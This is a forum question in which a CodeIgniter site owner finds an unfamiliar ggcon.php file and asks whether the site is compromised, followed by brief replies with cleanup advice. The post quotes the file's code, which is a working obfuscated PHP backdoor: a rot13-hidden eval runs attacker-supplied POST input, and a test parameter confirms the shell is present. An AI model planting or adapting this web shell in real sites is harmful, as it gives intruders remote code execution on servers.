# ggcon.php, is my site compromised?

Tags: php, codeigniter, security

I have a codeigniter website and i am an intermediate developer. offlate, my site has started to get real slow and today i found that there is a new file in the root directory called ggcon.php and i do not recognize this file. i am beginning to think that my site has been compromised.

the code within the file is as follows.

```
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['hji8rd']) && ($www= $_POST['hji8rd']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
```

Can someone explain this to me and let me know how i can secure my site. and also if this file is causing my site to be acting slow.

thanks in advance,

Naveen

Comment: That code doesn't look like it would slow down your site but if you didn't put it there then you have something to be worried about.

Comment: i'm quite sure that its not something i put there.

Comment: Search for   read_file('/ggcon.php') in your code.  Check your core/Codeigniter.php to see if it is messed up. Change your ftp server credentials to secure it. Keep your CI to latest version